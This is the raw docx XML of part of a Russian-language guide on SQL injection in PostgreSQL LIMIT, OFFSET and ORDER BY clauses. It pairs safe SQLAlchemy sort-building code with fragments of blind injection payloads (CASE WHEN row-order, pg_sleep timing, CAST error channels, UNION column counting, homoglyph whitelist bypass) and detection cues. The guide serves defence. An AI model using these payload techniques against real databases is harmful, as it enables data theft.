          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        if direction not in ("asc", "desc"):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            continue</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        col_obj = getattr(Order, col_enum.value)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        columns.append(col_obj.asc() if direction == "asc" else col_obj.desc())</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    if not columns:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        columns = [Order.created_at.desc()]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stmt = select(Order).where(Order.created_at &gt; func.now() - text("interval '90 days'")) \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        .order_by(*columns).limit(200)</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session.execute(stmt)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return result.scalars().all()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Каждая column валидируется через Enum, direction — через literal. Финальный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">order_by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> собирается из ORM-объектов, не из строк — никакого SQL-text от пользователя в ORDER BY не попадает.</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(expression в ORDER BY — SQL92+).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любая роль с EXECUTE-доступом к эндпоинту + SELECT на target-tables для extraction (для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Драйвер:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> любой — все три варианта работают через single-statement query.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user-controlled sort expression передаётся через f-string в SQL без decompose+validate.</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Полная sort-expression в ORDER BY — стандартный паттерн в admin-UI и reporting tools, где пользователь хочет multi-column sort с направлениями. Корректный pattern — сервер собирает expression из validated tokens:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Пример валидного запроса от UI:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># GET /reports/orders?sort=amount:desc&amp;sort=created_at:asc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># → ORDER BY orders.amount DESC, orders.created_at ASC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ORM-side composition гарантирует, что в SQL попадают только known column-objects. Альтернатива — построение string-spec через jinja-template с whitelist filter:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">JINJA_ENV = Environment(...)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">JINJA_ENV.filters['order_clause'] = build_order_clause_from_dict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В template:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY {{ sort_spec | order_clause }}</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f-string </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY {var}</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var: str</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — особенно с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sort_expr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order_spec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> именами параметров.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(CASE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(SELECT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 BY (... pg_sleep ...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> от endpoint без admin/reporting role. В normal-traffic такие expressions не встречаются.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`log_min_duration_statement`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: ORDER BY с pg_sleep — длительность × кол-во rows, легко обнаружить аномалии.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Database-логи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ERROR: invalid input syntax for type integer/uuid/...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> от ORDER BY-subquery — индикатор Variant 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 access-log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: query parameter содержит </w:t>
      </w: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WHEN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THEN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substring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 критичные signal-words.</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Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Все версии PG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">; expression в ORDER BY — SQL92+. Никакие фиксы не закрывают этот класс — application-level mis-configuration.</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Variant A — стандартный boolean-channel через ORDER BY. Граница: 3.3 описывает канал в общем; 3.14.4 — конкретная точка входа.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Time-based blind</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Variant B — time-channel в ORDER BY-sort phase.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via CAST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Variant C — error-канал через ORDER BY-subquery.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3.14.1 LIMIT/OFFSET integer-context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LIMIT (SELECT ...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — тот же класс subquery-in-clause.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3.14.3 ORDER BY column_number</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Variant C из 3.14.3 эскалирует в 3.14.4 при escape-режиме.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decompose-validate-rebuild шаблон для multi-column sort.</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«SELECT» / «ORDER BY Clause» — https://www.postgresql.org/docs/current/sql-select.html#SQL-ORDERBY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«Conditional Expressions» / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CASE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — https://www.postgresql.org/docs/current/functions-conditional.html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«Delaying Execution» /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 https://www.postgresql.org/docs/current/functions-datetime.html#FUNCTIONS-DATETIME-DELAY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PortSwigger: «Blind SQL injection» / «Conditional responses» — https://portswigger.net/web-security/sql-injection/blind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OWASP: «Blind SQL Injection» — https://owasp.org/www-community/attacks/Blind_SQL_Injection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SQLAlchemy Docs: «Selecting ORM Entities and Attributes» / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">order_by()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — https://docs.sqlalchemy.org/en/20/orm/queryguide/query.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Саммари: категория 3.14 LIMIT / OFFSET / ORDER BY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Категория 3.14 покрывает injection в специфичных clause-контекстах PostgreSQL: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LIMIT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OFFSET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (integer-context), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY column_name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (identifier-context), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY column_number</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (integer в select-list reference), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY (expression)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (full expression). Четыре подраздела разбирают одну общую ошибку — «эти clauses не нуждаются в bind-параметризации» — с разными последствиями: от UNION-extraction до boolean-blind через row order.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Главный тезис категории: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ни один из этих clauses не безопасен по умолчанию</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. LIMIT/OFFSET принимают expression (subquery → boolean/time-leak), ORDER BY column_name требует identifier-quoting (bind не работает), ORDER BY column_number даёт error-channel column-count, ORDER BY expression — полноценная SQL injection с row-order как boolean-каналом.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Подразделы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3.14.1 LIMIT/OFFSET integer-context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LIMIT {limit}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> через f-string без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-cast. UNION-канал (через append </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), stacked queries в simple-protocol, error-leak через subquery в LIMIT-position. Защита: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 bind-параметр.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3.14.2 ORDER BY column_name token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ORDER BY {sort}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> без whitelist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Bind физически не работает для identifier (протокольное ограничение). Bypass whitelist через Unicode homoglyphs (Cyrillic 'а' vs Latin 'a'). Защита: Enum + ORM ИЛИ whitelist + ASCII-check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-quoting.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3.14.3 ORDER BY column_number</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — кажется безопаснее column_name, но создаёт error-канал через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY 99</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position N is not in select list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (column-count enumeration для UNION-extraction). Также допускает stacked и expression-injection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skipping integer-check. Защита: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Query(ge=1, le=N)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3.14.4 ORDER BY (CASE WHEN ...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — full expression-context. Boolean-blind через row-order (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY (CASE WHEN cond THEN colA ELSE colB END)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), time-channel через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expression, error-channel через subquery с CAST. Защита: decompose sort-spec в tokens, validate каждый, build expression server-side через ORM.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Сводная таблица: четыре поверхности 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Clause</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Контекст</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Канал извлечения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Защита</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LIMIT N</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OFFSET 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integer-literal (expression-allowed)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UNION (через append), stacked, subquery-error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int()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> + bind </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
